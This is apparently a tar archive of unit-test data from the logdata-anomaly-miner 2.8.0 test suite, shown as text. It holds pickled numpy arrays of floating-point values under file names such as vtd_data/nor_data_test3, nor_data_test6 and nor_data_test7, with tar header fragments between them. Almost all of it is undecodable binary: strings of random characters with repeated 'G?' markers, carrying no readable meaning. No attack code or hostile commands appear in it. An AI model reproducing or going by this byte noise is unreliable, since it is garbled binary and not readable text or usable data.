MG?k@OG?pF"G?-*G?kBnuG?ㄐ@.G?dZPG?(^NG? M :G?] 8dG?Ǥ1d:G?;\vG?+G?DApG?+G?돦knG?]^|ȪG?~Y]G?U,GQG?.EG?\soG?G?B$zG?izG?CG?甎oFx0G? 2kG?Hx*بG?N}G?놁wG?gʆG?6p\JG?nG?aNxJG?B%[G?K5G?`_hG?2sG?j2G?Lc5G?&yG?񰰵TKG?*⯸G?-.;G?,ňG?mOYG?+UG?=,G?F{ZG?r$+G?l({G?V:G?D0}G?Pk\G?dmODG?)-<(G?xIGG?@h G?UQsG?Y|٪G?咤{[G?QG?Ռ dG?랱G?v>G?/M c3G?SG?rDu6G?[X~G?WDG?5d|gG?4$!G?6r7n+G? !G?ꙧTSG?9밃G?vv"VG?y E.G?G?sNFG?:GOG?ﶳ%vG?PǨĘG?=ZG?GFG?꧖BYG?Rm[G?}G?\cXsG?)S,+G?n\G?A G?-C`G?&]KHG?9 (G?KPzwG?;,fG?F-6G?s ,&yG?G9EG?O3 G?痗FG?^G?~FiG?>eG?v=?G? W.G?G?8 FpyG?a)czG?< cG?ϞHG?f G?#; ?G?2 kCG?ኹG?ǬG?蛱(G?MlG?GerG?Rr XnzG?,tgY5G?RʂS`G?kPG?sUTG?EHG?p.N0G?)gG?{cAG?F-҉!G?7$.[G?I5G?]VG?KnhG? KAG?a0VhG?;mG?약@6&G?0@G?M`VCG?8mG?,t6K/G?O@?RG?(׵G?YSI3wG? D_G?gJoSSG?$A'G?唓G?'G?رG?M[G?ퟦȎG?.4]G?bxtG?g? -G?^fG?G?CG?[푍G?n;G?n"G?#Hm~G?U]OG?0G?u7YG?6*_G?إfzG?x=G?Qo8)7G?Q\\gG?eG?{G?ޅOfG?y3VG?g9XSG?CG?l^\G?"aBlG?giaG?3wtXG?Hu+PG?B`G?|(G?)4k/G?WG?mlG?^G?8EG?䲧0 G? 6;PG?^d4G?R:G?,\G?idSG?9 (G?/ҰG?ڴ۳uG?͵bG?bG?{d""G?eX(G?UG?ο G?q1G?w]EG? IxG?D>S|G?귔+كG?srG?jG?ZG?\a)G?ꒆWG?hIG?1tG?U0G?MzT`.G?@+G?hG?Y?TG?CG?P`SG?X"ckG?n1[G?z~G?" G?An'G?SxG?qa ^G?L^}G?epG?8/RG?{Z]G?}.7zG?kꐔqG?엠pdaVG?v PG?YYG?QcqG?om?-G?ˎ60*G?}V%G?iC G?yàG?P=G?؊G? 0UG?KIG?49 xG?Nl>G?qgG?!OG?t!TG?þG?gA,G?!G?@G?v|EG?b{]tG?:rIG?䌾dG?ۇ92G?HG?dSKG?Y'G?h6G?-f_G?ZG?wO>G?JlWSHG?4G?cO&WG?!xG?7uG?QqIG?雪|G?vSG?:rG?mbvHiEG?nUG?2G?gG?'+BG?mG?Au6G?鸽FG?qhG?ܙemPuG?BDG?v#d7G?G?us?G?/7ReG?︫0G?&$fG?2R{~G?oԹ)G?@dG?9jG?)xiG?2G?EG?G?:nG?/G?ՎkG? nFG?/AG?!NG?EӏG?a\8G?eHG?<9 FG?[#,G? BVG?cogG?7nXWG? G?ZwG?$:G?]5y G?:|ۗG?Ȫ*7jG?'G?HG?*ѡG? (mCG?ApG?7YG?qۻ{5G?m&G?^yG?噃G?G?kJG?;CVG?pD8mG?bƝ{G? FG?Fu)G?QG?ֆ,;G?O\pG?\heG?p6c8G?b$G?1-G?(&KG?dG?RG?+}G?Bά;G?XUG? TUG?M?l;G?\8(;G?5nG?V_G?GG?B}G?pLf~ԤG?i.#G?Kf(G?#'7}G?-$YG? A7G?d9p"G?!G?"G?-v@G?˂ G?G?GVzG?sG? 1 + G?b]G?"6נG?:DG?ڔ`oLG?>G?]%eASG?옭CnXG?4hCs&G?C:KVG?吮rG?AmoG?CC.qG?u>G?aUG?{eG? 7)-=mG?C/|G?mG?GVIG?[5G?XP G?ʠLG?1ޜxG?tKG?xG?4xG?a*[G?汬;FhG?TWyNG?ҞiG?b8G?\CwG?v(G?yG?V;HG?ӬCGG?PG?jgNjG?MyG?ho"#G?TbG? ;G?裉G?[-G?ja9G?Xy{CG?F~G?{- ۍG?:eG?aJgEG?\G?k[G?)(yG? XrG?OPG?lDDG?Hۦ:G?{u!G?rԶG?ckIG?ޢځoG?,Gvs9G?UG?~]}RG?[*4G?^EG?퀡"tG? ('G?E?G?24pG?U(3;! G?sxKAG? 6MPG?G?_J3G?VIG?ٟr&G?G?BG?`ΨG?DXP+G?NB_ZG?EIG?) G?gۉ>PG?$_gG?^ G?X0YG?.@+G?LgձG?G÷G?ttG?ߞlfƷG?ݔ" RG?%4G?2jG?j03QG?.t^.G?-ArG?`G?)DG?햘AG?-ѕ` G?퉂w8tG?d >WfG?2mxG? G?@ kG?]G?n[kG?gmhG?.yG?X$G?H~G?P=lG?ID!G?CsxG?Axq*G?{pG?KpG?,G?wHcG?LG?v`6G?jIyG?:G?|G?Hkw1G?bwG? )aG?篼W'ѳG?m^G?$IUIG?U|G?0~mG?o~ G?l-jGG?8K1WG? oG?=FG?8G?G?s1G?/(`]G?QKSG?_w+G?{VٓG?T6T?G?f$ʌG?pNfGG? YG?6L 1G? 1`G? Q)G?wDZ0G?襪G?DT@:G?⤉fG?Z&G?W/T4G?ሟXG?ν!G?캩oG?_߷G?+쌫G?QsSbG?O͏G??^G?s1G?G?ESG?0G?fٖǃG?? byG?@s&bG?&/3G?5G?`lbG?a@G?s>G?- ;G?G?J/eG?XLjpG?h% 4G? ͘=hG?}tG?:;GG?(LG?u wYG?[G?_RtG?dB G?rM7G?9#VG?&\G?l/G?F, G?荙)G?0]YG??7 G?c^E G?ipG?FG?uj=A/G?wBG?v>uG?QNG?~JG?{=RPG?볹PG? L@G?(atG?y/wG?֐$G?Ǣ5G?SfG?B{+G?nl(G?5tG?[6G?:RoG?G?RO'G?ݚ'!G?cWG?֒ G?WmyG?'-nG?=u۸G?yRGG?eeZG?`w9G?xG?@!G?CG?Z\lG?fayG?Y*!nG?襼VG?֊G? =:SG?謦PG?)XzG?qUG?buG?nBG?*ާG?Dnl1G?CLR0G?%n}*G?Y4KG?JZ=G?sKG?z?G?b?G?8G?jY/G?sGG?1G?@hG?A&G?'EΘG?6{G?$rjsG?+G?%8G?2bOG?wUG?C}7G?䭤#G?aQEyG?#(owG?'}G?8?G?3YG?GG?-G?Z4G`vG?w\!G?SG?r^xG?|UG?ԛAG?rIG?ˣaG?oӗG?3 G?Yq+vIG?X/ jG?5YPG?^彝QG?XzzG?/ ƲG?.|U-G?݈kG?:G?$[ĩG? a/G?LJBG?~¦!G?^sMSG?F,EG?ԵN:G?ʕT#G?q^ԚG?PG?pU?G??TnCZG?0G?G?P YG?hG?jfuG?(G?.ⷹG?zD6G?[?نG?z}G?ہG?[ZG?h(G?G\G?wgG?2G?p ̧%G?puD(G? [ G?-QG?u5G?7(\8G?# \dyHG?`yAG?K+#;G?抠|'G?CIMPG?늊쎿G?;3{G?IIG?彙OH G?*_AsG?C-7D=G?H&G?"W:G?<2yG? 0ցG?Gh[ G?šG?ЀG?[xG?* VwlG?l/PG?.[G?eYG?휃xG?ʳL.G?JS `G?_aG?p?G?m0FG?knM G?ȻmdG?릇,G?+G?`G?{#vG?sqUdqG?4[EG?ݛZEzG?ri]G?쓫NVQG?LQ2G?ڌ G?<*G?UUG?'/G?K<(G?+яG? e](G?T7G?dW _YG?!X/G?.G?dݷG?3I#G?kZ"O 'G?ᆬWG?^gG?(1G?O+G?橷yG?qh(G?-W3>EG?7< nG?}]G?91'G?;j'G?u0ZG?IʄK$G?)dG?ediG?ItnG?ߔlZG?0](xG? pG?, A1,G?zFG?h'? G?ARsG?_G?ІB G?|G? -JG?쾧:G?"52G?VAG?ydG?ٜa.aG?قX}G?.G?P#G?{JH^G?AG? G?ZTG?얿=G?LpG?aLG?&_$tG?O0?:G?F[G?&cG?UG?t1HG?YG?G?pr\G?hr]oG?Sv;G?߫r#G?\lG?F}G?K2\G? G?J5G?,E7G? :sG?0,<#G?S-yG?3;G?X!? DG?G?K$R|G?_G??⛿'G?EG?쾖g6G?'@G?IC G?âG?9]G?tc0LG?OM& G?@ ݶG?G?WyƛG?^G?3BG?ж+9EG?XfG? uG?Zu7G?"#G?RAG?nyG?m3G?;hV2CG?d} G?qG?A4Q"G?셐IG?H~]G?c[qEG?:IfG?{]G?o]G?smG?eHJCQG?r\G?t>]G?:]:G? ?)G?OP G?C G? G?;">G?gG?,w3BG?_3G?:i6G?U!ϕG?v8JG?߮dG?"Z*G?yv3G?.F=EG?]LG?oG?'CڀG?bQG?xdG?)YG?g;.G?6O G?At@G?YWG?ڻ!G?s1G{G?ghG?K\G?1 $7G?*]lG?Q;G?Þ^G?ɟG?lG?fZa?CG?ǵG?2@G?0_j,G?6efG?ZDaG?.dG?c>,G?=G? ]VHG?N 'ORG?,G?8GG?CRG?kɄcG?A~wG?˱;G?/1G?UyG?%G?BLTG?Aa[G?oM'G?}tG?ړ3G?ﻒ?Q#G?c$G?Hܶ栄G?M!G?IhG?$v(G?j0G?YjG?}h(G?{->"G?qN{0G?;|v>G?'G?pj`#G?9! G?+#G?Ζ[G?!G?_ewG?Ө.G?`G?|sG?4>fG?0؎OG?;GwnG?"bYuG?d\G?:"sHeG?줸:{rG?, G?:#G?G?HG?`.G?G?8 G?6FpG?#G?*t!gG?<}UG? i`G?刢G?;g%G?&WG?u#fG? G?c2G?[)G?rcG?첃\yG?yG?,"G?! G?΂G?@AG?TRG?:EG?ã;%Z`G?|{^G?zAȽG?guG? l1G?rtn&G?]JG?7}G?YG?esS,G?cmG?tLG?W*G?JL[G?n!tG??8G?/G?gN!?G?bvIG?89ճG?ؽG?_pH!G?k G?Me'&G?G?ѽG?O}0G?Prbk[G?,'G?2ӔG?ܘN !G?0G?QVG?[ƪ G?qb1G?aG?te~G?<F%(G?+VG?BatG?%ZհG?GSAG?UVb:yG?ȓG?KD~G?1G?"*m dG?8 G?]SG?x97z=G?*]G?9:G?홨¥G? i#bOG?g%rG?2dG?WmI gG?훗6kG?(ťG?)n-jLG?XiڵG?4dG?vEG? Hj;"G?X͍H!G?欲hG?+DHG?_=]G?)/>!G?S&G?+ G?4/G?+o#G?ڲG? *>XJG?<G?*&oG?BcG?YG?֍%RG?H@)̚YG?x G?yb8RG?T/IG?bVG?$%OG?/TG? 'G?iG?B HfG?~G?((FSG?^+G?B8G? }G?Jj-G?:^^G?ݾ+G?=wcG?7 ~$):G?XZ)G?Ҁo0ʴG?ͬ$|G?聯G?﬎(eG?JC|G?n1?G?lG?L;aG?gKG?酸8G?=yG?i|&G?QuG?qdtG?Y,sG?轲GM'G?q4\G?߄G?{boG?l߳G?쪲.tG?]@G?/J՞G?ꡪ4G?ߵ613G?QG?TIŨG?_cNG?~G?LtHG?,F!%>G?ήTRRG?'۠G?̿G_ G?e艩G?JcXG? ]klG?[ͧtG?$ǜG?)ٜv-G?땔G?'[G?5 zwG?/M5PKG?(?vG?ǩaG?#r3G?ٳ"G?@_a G?s2MG?ܵe`/G?E%OǻG?拕5cG?أ G?QJiG?%~[G?h뒩G?釄G?B\f'G?k iHRG?xtsG?,|G?cG?}eG?{G?^BG?TG?}ROgG?80aG?[uMG?W/G?~'G?1c#4EG?)G?G?韘G?MRBG?ϣG?!bpG?َ.8G?kx~G?|=G?鼺qUG?gu9 _G?Do}G?-ȱG?G?2n'G?PސoDG?tCG?ĪKG?'RG?j={G?Vzn+G?xHG?A֌G?.S0G?1DG?#gG?J,G?{4qG?II>wG?KpyKG?m {@G?NfRG?vG?fSG?MMsNdG?ҮgZG?ێ8G?{LA}G?ernG?fycG?mX !G?xAG?'G?ZםxG?d1G?bWJG?$G?܊SπG?$UYG?馪KG?{SbhG? gpG?֯TG?:"G?jrXG?aeG?@G?"s`G?_ 'G?Ε 1G?ud$bG?찷 ,{G?鲩,G?|YG?%G?WLG?7S\G?HxG?6SdXG?AfAG?8]] G?E1QG?O{mG?G?DG?3G?Oq BG?/uG?ILG?x$=G?+-2G?ǫ`G?F1G?$ym- G?wG? toG?NG?o|pmG?FP+iG?WCG?ԅ[G?fG? 'G?DG?͖vNCG?UG?ظ[(qG?$4TG?2'SG?G?hȦG?jk'G?5nmG?xO%G?`izG?n` G?DG?dfG?,+GG?g["G?8xpG?G?悱9TG?ir DG?`GMG?rmG?/aG?KbG?)*jf G?`/1kG?7qG?G?ﴮv|&G?EG?l)G?bG?kOG?j0~G?xG?%cHWG?G? aG?sw0y|G?Nr}kG?zz"㧧G?f3G?\HsG?IG?ZG?UG?@:/kG?VϠIG?銦:xG?YS-G? G?NL컴G?ިG?I6j([G?HQG?D(G?/2G?Ԑ:}G?pG?HKG?[G? G?<_iG? h8:G?-G?tL 1G?vG?Ms%G?6G?* G?O3JG?}G?,;G?ڛ G?F4G?ƁLG?O"!^2G?u9zG?B/G?7G?:zGG?8|G??WwG?kҿLG?`f#G?,@!4G?J G?H G?A$G?m G?i&=G?zG?LQpG?XਜG?c7G?V9 G?3`G?*(ѮG?a:G?n f >G??G?5fSG?cfzG?>pG?^@G?%G?2G? fG?]kG?0{tG?@VG?&qG?&'hG?\ 'G?i=G?8DG?|1{G?P\jG? :#1G?|6φG?yc6eG? ))9e](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/nor_data_test3000066400000000000000000000432761500476301700273270ustar00rootroot00000000000000F](](G?©bXG? $GG hOsGGwm0G ;GE%8G(AGp}G@5cG?)Gι$G?2O\zG?75Q6GQy r9NG&l&G?MIGmG G? YG?="G?MSOMG?_"/G?4fpG?ζbGעfǻG@g"6G?tN|LG G΄eG?U¤G@~'G?cz`CqG헎yG_~rG?n4yG?lyXG?/ IG?1jG?K^ G? @[M?G&GD"^G?4 iG?AUSGii+G?IG?34G?.daG?)@G?͝?G?ܫWe6G4*OGqG{AlG?>39bDhG~tK(G? "G?jM)G? G +!pG?VZGd[OGGf^VGWkAGѵglv8G?>_yG?=߲G?~GpwkeG?aGp6,G*/G?S[ٚG7۵G?p/ G?륔I ]G?w$HG?ZrAG?q˥sRG" ]GG?]GRPGs>GLGśGPG`PҾGV`G?J\8G?Ay`ފG?{rfeG?<>}G?ȫ5G$FG?HÇi(Gh*PG۔oGSIZG?qwGk (pGW G?|,XYGxGC1G?(BeG%Nt*G?9 5AGvVZ5G=G?6s^bGx5G?0"ghG=C9G?%bG)pEG5EG[tyG?SfrGd%oGPوGƃނG?ZG?ca8uG4Q[G@,G䯟\GGG?->Gk GrΥGFG?$9>G\:3j#G2(CRG7+FhG?JWgG?FGwGm`GYlwG?{UG?+G?ڔG'G?Ge:dG?GKG?vvmGrG?, G22G2SG*~~G?=Ӌ G?[ 9AG?G?iXG| %GkW*;GM g7G?3J2G?Tj@G?C?BG?\I+Gw1ҙG{)}TG0<Gә.;MGjGJG=lG  G?ΉVwx[GzG) G?ʇPV\G?BG#}$o&G?[Gd!EGjFeG?@/G*ԁG݃h&GծG?1s G? dWG^>@fG97yG?˦+'GwG? CHՄG߇*G?,B}G?S G=fG͉Gxj*)GkG?(KmnG?չY`AGX}G3/Glp>(pG?!MnUG?r_GriGt.3GPWT4G\MMjIG@rsG?}GP'G~G?*pG s]G?a?G?u`Gf1CG?ݓ+tjKG[k0G䨂iG[nujG?]ɊG`!fG?:"G?۞G?XG?xnGZ:G?[_vGG?Քit%GӾYGኛTG;Gܿ~0G?t.G?b(G?G?j .QG禗ֲcbG?A.0yG㪂G1 p0AG?b|ljF G?x;G@Sت)YG?zGnD Gn; "G?&rWGܕAG?;yސGL'ljG?:;G?dM@G jmTBSG[9v.G?#ReMG?_|FaG$%?R@G?ňf Gꤌ6 UG?<+G?Keۛ3GzG9IG=G?|p G?HMy;GNyG?1˶G?繈GMG"QA|-GnzG&mG?h6mGr;~LG?2C\QW2G?0 (GG?! G?抎"*G?abWG?ٌGG\>vG?h?pG?`G?ޣtG?N<G? e G G?reN4G֜*mJ-G;Go=G?@jG?hhOG?iPiG?CTG<'G CNG4G)3Hm3G?`GCG@ ~G?[ŇG?G2W*,G?)G?&3G?g,cG+`G%s'G?EXG7 0Gā˅G??fNG?weGbX^ $G?;+`G?BEG?M7GڳG?<+G͢65hG?B6Gۗ"(aG?5~G?yOGP؎ GfCGPȂGR/p G?#G?[+.fG{jlG?rXG?~;h".G?)B Gҗ GHHNG?PyG?.3G?frG?݊ gG?nlinG?ibG?Ջ0|AlGG)bG?yC G?1G?":5ЧG?R}}GKv|G8-GLǡG?yO6LG?WJG7H.G?DnlG?unSEuG?yqG? 9/wNG\rJ+G? XRG?K &1G k,G?DJ`=G?ȹ(G?E$ GD@%*G?P+r$G~G?V=*G?BWG3G?SrXyGo pG?>UB'GG?Y vGR eG?-bG?L)3jGD!kG爵۷G?XInwGۺ܏G?(/G?ja|G]G&_VG?R`(,G?$}ȝ]G?)G^#:]G?G)Q掞G8+:Grh|aGHwKGc%G?OjG?ɋ"|GwGmbmG? G? r/G?B_G&/G$يtGLFHG%rvGOG? h"G?L`G?惽:^UGS G[2brG? `GM!#G'@NE4G?ޢ61WGd+Gũ75Gᒐ <@G*G?0嗴Gv-g G瞫 GB$G?]Y6*sG7KG?5h.G?א;}SOGyFG?\+G?%hӂG _G?JyG?JdG?<CGG?<>vG,vVm`G>+G?Dtm}>G?ع\ˈG?#c$G?MժLG?c| GlY=FG痯iQG?-G`Gs3G?c`o5>G?Eo{PG?+GOG~YiI_GxBmsG?SBNrG?ڷfxEGZ*zGE|TGǻi?@G6[iGcq+G?(G?GG?Ր`|SGՉ@%&qGk329G?v|3G?G?vn 'G?{HG?ع]tGGG.G(mGOZG?CxKG[f!Gx0G?Olj%G?߫9:G?޷]7G?1|#G ;!9G?)TG(?!GzֿEG?ikDG? G?30G?,ꭉGnPGP"^GFFr9G?~8G;G3xgG?uu&QG?e^ G恀Glg\GKRG?_qG-.gGkWyG?jCG?bTIGρXqG=8t8G O5G~I20G?`G}AG% G?DŽG?LE^G?-hcG?>ҸG^>GT)ψG<6G@R$GfG?J!G'=÷BGݻ4AGsyG?6вGw83GN)G?yG 8îG?{DG@/G?K@DGlDnG좳ՊG?xD kgG޲=aG dG@'#GŚ,cG_bd#GS G;9kyG?#!j-G{3G?&>@GΊdG?qiqG?MGY@&G@5jG[=G?*s&)G?>)G!&DpnG\G? 8ywGG❆ =G?>/GT+GpcGz߈;G?njG?:/G?|vG?Z@G?xG?찧G|QyGGiG~UrKGuG?3FhG¥VuGfG#*GTmG@5|G%1h|GA[DGt~m1uGq~RG?4]ʼ9GɀXNE G?㜟NG?m7/.G9\PGR Ga8{IG?OGJG?ڰT\@G8qG}RX;G64VG? -fG{n.GBG?ԕ`G?ڊ^ [G?08GG?38G1 a;G? VŽG-<){G?BGG;G?D&wG^p =GܫfG?_PƠGT[G?QȖYGg^G?|P֊G?G?z?6]G?aHGGؤ G{GQkG?DJ!G~GL )G\+G@ sG? qG3YGmAgG?+9G)%G?"_6G2NG? PG7"DjG?NH!GvG?$f_pG.GYe(G?0- G%G? ůGcw[$GYjG*5GG%fNVgG?{¯!KG?|l9G>܅=G?Қj?>/TG+NdGVjGӴmsތG?ȼcЁ Gّ4mIfG eG?%Z>G?qYQGGŝ@o9tGWX(GLdNG?3F%VG?8ܞGZ>G?їcRG|HG?*MG?Z8FG?kG?_G8 EG+4{mG?gVNLkGd4٢G??eG?ĩWG?&UGի(WzG?܋:6[G?i*vS+G?nqG?IUG?!"KG?PۣG?r\>Gvv@Gg[^G?}G?}_"G?@G{ZCA}G?Lʊ`G? =ؐG?` XgG?_fiG?ۘ'"Gx;rXGIY>G?@ʵG?[G?ㄨ1daG?tiHiG?ogN%G?ȱG?IZ9˒G?4K%įGO}$dGr>!GG?ꙡKJG,G? (uBG?oҞEQG?j)KU#G?Y*5]GvG )G7 ~G?\$G/G?[G@qG?&,@G?kW'G?]G󦿥VGR+XG?,fJG?Z^%GT`G?w3GxHQaG?LjF`GUG pGڕ'GGoG?)G?#PaG?殉yG?CqwdGbG?thrGf&M\.G?FGGߙ0WG3)GyG?;uGQSôG;Gv iUG?بi]G?xKG9oG?gG/cG? G@2*G?<"G?;g4G‎G5/G?7NJG?fG?m^SG G }'G??+G?cjN G?繁G?G|!G?CIWG2pߍG" G`gG?СwuG?&Wn9Gف 1GP8]+GEG?G?3:YG?x"cG?Z2y1uG䀨Ԭ6GNyGé6G?ؘb靻G?H%Gv G(8WG?_YHG?%G֛H~G+GljG?x1`G}̔G?t;GVrG?,+~G!G?͛@ϼGd AG?<#$GZծG?f13AG O{G@ZOHG?jGᥥg7G?0qGr"TG?Ԝ؀G"BZG?Q̌/G=wΖuG@N7[hG 7G@5:GyGWuGDG?79Gt M+G? ET(G]G? G?ԏd[G?F~ԈG熋|ŪOG?")"TtG?% G?S8.=vG?-fG?jGѻVyG&G?Ҋ~0kG?%dG?{ G? ٓlG?g%G?yt|EG?)ⶉEG GӚ&VGvqG.'DڸNG.G?8DEG?ѯWG? G?:wSG施F|G?Jz8?G?V4UGO"~G.[GM^zkG?G^lXxG?quGf+)Gȑ{G?;YG?@mGpBG? 4,C4G7.G?o!tG_^b*G?8 z4MG8\X6G?xl9`G?R?3?G? G?s{PGG?G?)lfHG?pK& G?1ȌG 鎒G?;GP* G?k`fG?kG?1hkwU7G9GទzG?߁Ţ9GzG?%zG⿧ 'G? 8G?( GsG?"3˾2G^]XG(GR[GR6G?k RnoLG+e GevG?0G?lC٪ZG[M`hG$INnGzG%^? GDG@3\G!PڿG?1oG&4G?ڭleG?VIPGI2 >G? DG7lcG?2^GG?;G?]ؚ=G%(_4G؃; G kGިw€G^I7GKoG?;jG℅5G?qlG?}9@G?CͯG 5GQGjА{G?˙G?ܜѲoG?BG%|G?%eyG?@ +G3ҕGwӏG5G?b,Gْd )"GLդGťG'GF\=G$G?y:R G?$rX)GK1EGvG6=@GP0]Gy"GToZG[n?GUӛG?h~lZG?|GύحGAn~VG?DvMG }dG?fNG?'3G= G}~ok,G?pG?cG?hq)_AG?^GRG?ʢzWG4Q;G?X`GDG?!G?tqG?=a\G]2RG纰'G?8/G?*GT;{)|G?HfG?ňG?COMG`sBG/{`GG?7fGGw"wUWG?|[ Gց},G?;>G?{* G?/ G?iG?Ku#^(G3LFG?UYGMpG?~W@G?jZyG?ҡyG?]+n\Gy|EsG?6pBkGumGa#+/GroGG?4p dG?^mGD߱/MG? G?&ofGd<5&:G? 㜄TG?JG?IG@YM;G<3G?˛G6lnG?ꖊvρGWZ%G?ܣP8&GܨtyG?-G?Mx;G;17G?zG?\GYkGFG?_s(GG?C!nGzK(*Gt W=GҹR>G?qe G?σ“G881G? 4'G?ṢGr ^G?0=VG?;R͡G[5@G̪hG?cbXLG?t0, 7GP.G;z3MGCGuG?x^JG?8qzG?ѵ]G > G?X!G<eGp_vG?B>TGY6G?ҼlGZ'>G? ̇eGR=9G?vG?jG?`%λGP/RG7c*G?_ $GG?$TlG?(zG?mGsd@G?_wG?lpUG?KmdGoW5G2G^?GY8JG?=nGa{u"G{BG?`IGߥsMHGw!iW{^G?">%-MGڔaTG?N@G?o]PG?.}Gۙ-Go5G? 6}e~G?x*/G?e=HG?s:<;G.G?_qCaG?V(˾G⅀MG?"JBG?2eG? GشCf^=GOG?&fG?PX[G?ZG?;+}G?.&z qG& iG?68XyG_PG?LG:GS޻MG?tRG?<.O6GCtG??0eG?/6GKjG3;FeGCG]BG<G!GxWG?0G? G?*8,#,G`._G۳")G? SG?lrG?QϭG?E"Geq!GyG+ͤdG?CeJGfGco0G?_@ёG?+e>G?<9Gk=cG@^u~GwG?Ӳ'Go2G??GeG*FG?CNPG@6qG?KhwG]OSG?88!G@km{GzͫG? G#G?T KG8GcyG߾TG?ݶ3QS|G?*‡/G?P\G?.yG8ߌG?@a&G"f{G?X«/G񊫃 G cjG?d2G? G?MGes;G $Z$G9GV,Vٸ>GA%G?AϢHG?03G?&UPGy~SG-!QG: G?ZCGGG?[G| G?QG0GǴkGK/GG?w5XG?^{GB0QG? bG?x]QG3205G? G?kN|sG7fEe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/nor_data_test6000066400000000000000000000046301500476301700273210ustar00rootroot00000000000000]q(cnumpy.core.multiarray scalar qcnumpy dtype qXf8qKKqRq(KXq?Rq@hhC;oL?qAqBRqChhCM~' r?qDqERqFhhCBUQwqGqHRqIhhC(FJ?qJqKRqLhhCy~ @qMqNRqOhhCO_?qPqQRqRhhC3y0'ӿqSqTRqUhhCz?qVqWRqXhhC* qYqZRq[hhC<'ڿq\q]Rq^hhCmiv?q_q`RqahhC8@E޿qbqcRqdhhCY~غ-jڿqeqfRqghhC?'KqhqiRqjhhC|v?qkqlRqmhhCmҴ?qnqoRqphhCo?qqqrRqshhC%-"?qtquRqvhhC$zC?qwqxRqyhhC9h-?qzq{Rq|hhCBZ0'Nſq}q~RqhhC0k+jǿqqRqhhCVn#?qqRqhhC4?qqRqhhCQnʒqqRqhhC檔jqqRqhhC:p?qqRqhhCjq$qqRqhhC{qqRqhhCaC(qqRqhhCuj\qqRqhhC6Z?FqqRqhhC#dnqqRqhhCB]'&\?qqRqhhCJiɯۿqqRqhhC3qqRqhhCy?qqRqhhCX*ſqqRqhhC wqqRqhhC0:(sqqRqhhCTVkqqRqhhC{L?qqRqhhCxqqRqhhC{zjq†qRqhhC95qņqRqhhC*:-qȆqRqhhC^?qˆqRqhhClp?}qΆqRqhhC7MqцqRqhhCY qԆqRqhhCwYNq׆qRqhhCM̍?qچqRqhhC?q݆qRqhhCN?qqRqhhC}M/o?qqRqhhCR>ĿqqRqhhC%ڊqqRqhhCa6/?qqRqhhC|8Vo?qqRqhhC Y?qqRqhhC`?qqRqhhCbxZ ?qqRqhhCtL9+qqRqhhC+s{qqRrhhCҫ4@rrRrhhC')&rrRrhhC+bLLɿrrRr hhC@C{Կr r Rr hhC!vBr rRrhhC/Š~*rrRrhhCrrRrhhC ?rrRrhhC?$T?rrRrhhC ?rrRrhhC$L@rr Rr!hhCH1+??r"r#Rr$hhC̷&?r%r&Rr'hhCr(r)Rr*hhC[>u@?r+r,Rr-hhC쳚?r.r/Rr0hhCPVr1r2Rr3e.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/nor_data_test7000066400000000000000000000647021500476301700273300ustar00rootroot00000000000000i](](GyWQG$@9G?W66GiG? PGTGH:uG?z&˲G&[}G>, G?7̇ G?G?`[;G???jcGNG?햚'G?^7F.Gw-5G3 G,:Gՠ]PG?ѮG?RGtHT/G?ǟ Gʕ>nG-tL'GG?)$GU tG?d]=O1G?y,׵GnغGSG?bAG?|-ͶGA)G#w%*GpDG?$'G?ʲGw~Gӊy`G?mGgG?s&6G?גkGn0G?>G?7Gs6ɵCG?TtrNG?<)GG?jAtG?lIG\HpGǡG-GݧG?GrG?PIQG?dFQG?GѷT=D QG?qGg RmRGԾ܋$HG@fubVG?\6V G|G?u%G?eX G?l)$y\G̳}.GhdG?#tGG?۱&G@RxYwG?⵫1"GƱ TxG?XAGݰ'[G .G1'G??x5GE|F(G?XN 8G?;@sG7LGˀV=G6Rc Q G?K2G/*QG.VG?:G"HGUsGG?(@Gʵ诞pGFEk G?¡UGlG@ ,)eG?_GKyoG?KL+~G?”DG?O/vCGrwkG?!lVvGG?Ϲ~"G?3L%G?G?_GG?ܭ[GsH߽G?a<G?GCGn¬G?ñ3"G?ݔuG ؞GZj=|0G hG?+{kGҦG@)5G? q"G?ұG% #\5PGn}G>G?GG?}U ;G?ټG+* GVRtaG?=9G?ȷH x[G2%߫?GЩEGsjgOG?1;RG1&MޯG?;k G˨%>&G=:GgG?IKs"G?4F5xGU~G?XF_ G?aā]G!-$tGe.pG ]čG?\7jG6GGR4 GV ~ƙcG?Y)6 G?`懤G=D;RG?¤U.G?{!G7 5բGV&>G?,` 9G?UUvG?Q?CGN$FG?{זG?v{OGG G?`SviG?6(m G?vClG?GKն,GK+G\G?pMGZN1G1LG?87Gt:)GSQ]SPGƚf*GwYFGv!GawSl%Gސ ^G?¹ G?)3 G>ر-G"bGrvaG~]G2:~G FkCG.G`KwvG?gazGJLGtaߵG^cG?̣>[cGSGTaG@֛GcE.G?Ij G"GJSDyG#dPG'Rg#G? \A/G G?](zG?~QvOG={cw8GOf]`;G?nªSKG|+G?UGjY?G@CQTG h|{G8FdHaG?<@>G?ԍU<<^GĦ#G?hJxG?9rGڷ|GG? mGuGG?ǣGÓK^Ξ;G?'zG?-RyGRRG=GfZG r#TG??lGLPyLG?IGG5+]G?"/0G?4G?GFzG?WvG?kۦG>hQG=,.GpG?`GȃԻYGi&GB@5!eG6GHG?,ލyG@CG?G莩ZUG?MLGY L]G?ʉG?2, G?evG?⍭wb=G]GO 7ѰG?_$(nmG? koGD JGs/$GzG?b1GTUGCM|G?-A0G}UV G?WGhڌG~Gev5GZΈYG?+|t:G? \G?[ GEs>G?KeG^_GΰG?)mG?ʈPGB)GܕrLsGש-G4_D@G? LqG?=2G3QXG?b0IGߝHx GT}q G?xSt/G?悉L7GCCp%tGFqGxZ`G$4|GS)a[GƓDyG?CpGz{GR sG4pG?4i4@G?;*kG?DT*G?3p|6Go:G{(>G?4,:G?ɟOG?AG?ٿ-ƹG֠Yq\G?kGHG?B=G#v*IGx:cG?^)Gz3(G?9tG?lо7G2ŃG?Ȅ`CGG)TeG?`Nq4GjG?פ]%GɝQGG?ޜG?1RG@x4_!G? rXG?77 mGC7G4dG{G?pXG?0mWkGR6ƀG?}OG?qH:3*GTVUG?QnG?%yG?ZIVG?磑!IG0WGԿ\{G?cm/G? ]s7G?5&A%G_JYG?! RG?)AG?۩P\G?q9Gy1GĎc1GB|G?ddG?₵G86GYWRMnG?uS 